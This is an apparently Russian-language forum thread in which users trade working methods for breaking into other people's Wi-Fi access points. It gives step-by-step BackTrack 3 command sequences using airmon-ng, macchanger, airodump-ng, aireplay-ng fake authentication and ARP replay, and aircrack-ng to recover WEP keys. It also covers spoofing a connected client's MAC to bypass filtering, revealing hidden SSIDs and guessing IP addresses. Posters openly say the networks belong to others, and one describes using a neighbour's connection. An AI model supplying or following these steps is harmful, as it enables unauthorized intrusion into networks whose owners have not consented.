![]() |
ALEX 87
у меня такая же фигня была не мог подключится к точке потому что скрытая и без шифрования, и рядом неодного клиента,но используя CommView собрал Beacon пакетов гдето 40000 и имя сети само появилось! а подключаюсь с помощью проги WiFi Hopper очень удобная ,попробуй мож получится! |
Semby68
Добрый день.Попробовал последним способом,тем что ты ссылку дал с видео,неполучается!Ничего не могу понять,собираю пакеты причём разными способами aircrack после подбора мне выдаёт Failed.Next try with 10000 IVs. и чем больше тем больше он мне пишет IVs.Вчера собрал 5000000 дата пакетов,и нечего не получилось!Может что не так делаю?Хотя всё делаю как в описаниях по подбору!Может,просто нельзя подобрать ключ к точке,так пробовал не только с одной и ничего! И ещё вопросик,как можно поменять свой мак адрес и где это делается? |
Помогите понять принцип параметра PWR, ака уровень сигнала. Он всегда отрицателен. Правильно ли я понимаю, что чем ближе он к нулю, тем лучше сигнал?
|
boykent, а ты точно WEP ломаешь? Если там WPA/WPA2, то атака только по словарю
|
Здравствуйте!
Я владелец лэптопа Acer Extensa 5220 с wifi модулём Broadcom 4312 и WinXP SP3. Как мне перевести wifi модуль в т.н. "monitor mode" и какой программой ловить пакеты, проходящие через сеть, к которой я подключен? |
Несмотря на то, что эта тема уже неоднократно обсуждалась, все равно отвечу. Для перевода карты в monitor mode необходимо установить специальные драйвера WildPackets (для использования пакета Aircrack) или CommView(для сниффера Commiew for wi-fi).Но насколько мне известно для чипсета Broadcom таких драйверов нет и для мониторинга он непригоден. Так что если планируешь этим заниматся, приобрети себе совместимый USB или PCMCIA внешний адаптер, про модели адаптеров где-то здесь была тема, сейчас искать некогда. Да , а зачем тебе переводить карту в режим мониторинга, если ты уже подключен к сети? Вот если ты хотел бы ее взломать, тогда другое дело, а если ты уже к ней подключен , то подойдет прога WildPackets EtherPeek (для обычных локальных сетей) , тогда не нужно заморачиватся с monitor mode и драйверами.
|
Уважаемый x-demon
По сути уже начал сомневаться что я ломаю!Есть такая проблема,сеть которую я пытаюсь поломать скрытая но имя я уже знаю, в ВТ3 когда я над ней работаю в консоли она значится так; BSSID 00:40:96:55:D8:23,PWR 17, RXQ 82, #Data 3565363, CH 7,MB 11,ENC WPA, CIPHER WEP, Auth OPN, в WINDOWS разные проги определяют эту точку как WEP, если есть какие соображения напишите пожалуйста. |
Цитата:
Вообще говоря, даже если ты пользуешся не BackTrck'ом вся проблема в длине взамываемого ключа - у тебя выбрана неверно. |
Цитата:
-0, 01 это п..дец как близко :) |
Цитата:
|
seteboz
А можешь подсказать как это сделать в ВТ3? и ли в ВТ3 подбор ключа идёт автоматом от 64 битного и выше? |
Цитата:
aircrack-ng -n 64 -b [bssid-сети вайфай] [filename- файл с перехваченными пакетами]-01.cap http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3 По этой ссылке подробная инструкция по взлому WEP в BackTrack 3. Всё проверено всё работает. Возникнут вопросы пиши |
Уважаемый seteboz!
Попробовал я её сломать с помощью вашей подсказки и по ссылке смотрел,и так и так пробовал,ничего не получилось!Дело в том,что эта точка она скрытая и когда я ловлю с неё пакеты сначало узнаю название её потом как не странно она с WEP WEP переименовывается в WPA WEP шифрование!Рядом есть ещё точки у них шифрование такое WPA2 TKIP ну или чтото в этом роде!Может быть что та точка которую я хочу поломать скрывает не только своё имя но и шифрование с wep превращается в wpa!Какие есть мысли? А где можно хороших словарей скачать,а то меня уже стали окружать одни только WPA?И вообще,есть кто на этом форуме,кто смог изьять ключик на WPA? или ещё мало кто смог преодалеть такую защиту? |
Цитата:
BT-3 1. #airmon-ng 2. #airmon-ng stop rausb0 { rausb0 это мой драйвер для wi-fi карты поставишь свой какой выдаст airmon } останавливаю Wi-fi карту для смены мак адреса . 3. # ifconfig rausb0 down я пишу этот { 00:55:67:89:55:22 } 4. # macchanger --mac 00:55:67:89:55:22 rausb0 запускаем 5. # airmon-ng start rausb0 видим (monitor mode enabled on rausb0 ) Теперь сканим доступные беспроводные сети, использующие шфрование WEP 6 .# airodump-ng rausb0 остановить airodump клавишами Ctrl + С Остановите airodump-ng и запустите его заново, записывая все пакеты в файл: 7. # airodump-ng -c 11 -w pokemon --bssid 00:1E:4C:B2:A8:47 rausb0 атакуем точку и комп 8. # aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0 запускаем дишифратор 9. # aireplay-ng -3 -b 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0 посе сбора 20 пакетов DATA запускаем aircrack 10. # aircrack-ng -b 00:1E:4C:B2:A8:47 pokemon-01.cap и ждёмс ключ .Очень посто! если на точке висит комп вообще быстро взломаешь и смотри чтоб сигнал был не ниже 17%, выше сигнал успешней взлом ! всё получится ,дерзай ! удачи ,с уважением ко всем участникам сайта # Semby68 # SPAIN- RUSS # И ещо , купил адаптор USB WI-FI мощный , вот ссылка http://www.chinavasion.com/product_info.php/pName/80211g-high-power-wireless-usb-adapter-rtl8187-chipset/ |
>>aireplay-ng -1 0 -a 00:1E:4C:B2:A8:47 -h 00:18:E7:3F:6A:75 rausb0
Я бы при отсутсвии клиентов, да и вообще, использовал бы атаку p0841 - aireplay-ng -2 -p 0841 -e <имя_точки> Не забыть поставить канал на котором висит точка с помощью iwconfig rausb0 channel <n> |
Цитата:
я так понял { iwconfig rausb0 channel <n> } это настройка скорости между точкой и моей картой . а атаку , p0841 , попробую , благодарю !# Semby68 # |
Semby68
x-demon ОГРОМНОЕ СПАСИБО!!!!!! наконец получилось! я вместо своего мак адреса подставил мак клиента и пакеты посыпались горой в 100 раз быстрее!Удачи вам и процветанию этому сайту! НО ТЕПЕРЬ ВОЗНИКЛА ДРУГАЯ ПРОБЛЕМА!Как подключится к этой точке она же скрытая! использую WIFI Hopper!или есть др.софт для подключения к скрытым точкам? |
Скрытую точку обнаружить просто. Надо запустить airodump-ng на канале, на котором висит точка, и ждать пока кто то подключится. Либо вышибить уже подключенного клиента. Как только он подключится - имя точки будет вскрыто.
|
Уважаемый x-demon
Вообщем получилось прописать имя и ключ ,но всё равно не могу подключится видимо там на точке стоит MAC или Ip фильтрация адресов!Может такое быть и как от этого исбавится,как мне изменить MAC и IP адрес чтоб подключится? А как можно узнать ip адрес точки доступа к которой я хочу подключится? и надо же ip знать? |
macchanger --mac 11:22:33:44:55:66 wlan0 - значения подставить свои. Нет, если на точке включен DHCP. Если не включен... можно попробовать узнать пул IP адресов с помощью kismet
|
Можно и средствами ifconfig'a
Код:
ifconfig <iface_name> hw ether XX:XX:XX:XX:XX:XX |
я так и не понял как MAC менять. Вот что я делаю:
# airmon-ng Допустип выдает ath0. Далее останавливаю: # airmon-ng stop ath0 И пытаюсь сменить MAC: # macchanger --mac 00:11:22:33:44:55 ath0 А оно мне типа нет такого устройства. Что я делаю не так? |
Блин что там сложного?
Код:
ifconfig wlan0 down |
При работе с BT3 или BT4 не происходит сбор #data пакетов, в чём может быть причина? beacon и pockets только собираются.
edimax ew-7318USg |
Всем привет возникла небольшая проблемка по подключению к сети сеть сама по себе открытая но стоит фильтрация по macу и вроде бы все легко (заменить свой адресс на другой зареганный в сети) но при замене к точке хрен подключишься она меня просто игнорит адаптер edimax 7128g (чип rt2501)
|
Kortez
а рядом с точкой есть клиент?тоесть подключён к ней кто? igor29 Попробуй IP адрес у себя прописать,у меня была такая проблема!сначала ключик добыл с помощю ВТ3,а потом прописал мак его клиента, не мог подключится!а потом думаю дай я с ip адресами побалуюсь,прописал в насторойках wifi карты 192.168.1.2,и всё стало мне счастье!сейчас сижу на точке,правда пока клиент в сети я не могу подключится,но он редко бывает!Так что удачи! |
[QUOTE=boykent]Kortez
а рядом с точкой есть клиент?тоесть подключён к ней кто? Точно, протестировал на своей сети, поддключил ноутбук и дата покеты пошли. А как быть с чужими сетями которые молчат? как понимаю их надо как-то разговорить, если не ошибаюсь, этим занимается aireplay-ng ?при помощи инъекций |
Добрый день! Уважаемые колдуны, вопросов много, начну с главного (ибо сегодня нужно определится) Вобщем купил точку доступа Planet WAP-4036, но нудобно без хаба, хочу сделать чтоб инет раздавало без взаимодействия компа (сервака)... Вот думаю сменить на Planet WAP-4035 со строеным хабом! Вопрос такой: какую точку лучше взять, интересует дальность радиуса действия и стабильность работы! Или порекомендуйте других производителей: только D-link, TP-link или из Planet что то иное! Другие фирмы не предлагать, ибо у нас их почти нет и цена кусючая! Заранее спс
|
boykent
спасибо за совет сменил mac и ip но ниче не изменилось |
igor29
а ты не пробовал баловаться последними цифрами ip адреса? Пример: 192.168._._ , менять последнии цифры!У меня сначало тоже ничего не шло но потом попал,и не получалось подключится когда клиент,хозяин этого мак адреса был подключён!может в этом причина?! |
Kortez
Чуть выше описовал взлом Semby68,за что ему спасибо!Попробуй этим способом,там можно заставить точку с помощью aireplay-ng отдавать пакеты твоему мак адресу! Да, и там есть строка, её нужно прописать так: aireplay-ng -1 0 -a (BSSID точки) -h (твой BSSID) -e (ESSID точки) твой девайс (у меня он ath0) Короче, вот ссылка там всё увидешь: http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3 А ещё, что я делал чтоб пакеты быстрей собирались но это если есть хотябы один клиент возле точки прописывал вместо своего МАК адреса мак адрес клиента!И скорость сбора увеличивалась раза в два, в три!!! |
boykent
Спасибо сработало,оказалось ты был прав тот mac который я подставлял был занят я чуток подождал и попробывал снова, сработало :cool: |
Цитата:
|
boykent
спасиб за предупреждение уж за этим прослежу :) |
Цитата:
|
Поделитесь возможным успешным опытом установки и запуска Kismet-2009-06-R1 (берется с сайта http://www.kismetwireless.net/download.shtml) в Ubuntu 9.04
Я запаривался настраивать процессы kismet_server и kismet_client :-( |
Цитата:
|
Цитата:
root@bt:~# aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 -e JAZZTEL_1D wlan0 06:49:59 Waiting for beacon frame (BSSID: 00:1A:2B:2B:6E:20) on channel 11 06:49:59 Sending Authentication Request (Open System) [ACK] 06:49:59 Authentication successful 06:49:59 Sending Association Request [ACK] 06:49:59 Association successful :-) (AID: 1) root@bt:~# aireplay-ng -3 -b 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 wlan0 For information, no action required: Using gettimeofday() instead of /dev/rtc 06:51:23 Waiting for beacon frame (BSSID: 00:1A:2B:2B:6E:20) on channel 11 Saving ARP requests in replay_arp-0625-065123.cap You should also start airodump-ng to capture replies. ^Cad 4153 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps) Но data покеты всё равно не собираются...хмм |
Kortez Слушай ты прав, я в начале ESSID не прописывал, сейчас прописал и кажется пробился, во что было в результате:
root@bt:~# aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 -e JAZZTEL_1D wlan0 Попробуй вместо своего ( -h 00:11:22:33:44:55 ) прописать bssid клиента, но это если есть клиент рядом с точкой! или если нет клиента может ты знаешь bssid его?!тогда попробуй прописать если его даже нет! Вообщем побалуйся,мож чё получится, у меня на 100 % вышло! |
Цитата:
|
| Время: 16:46 |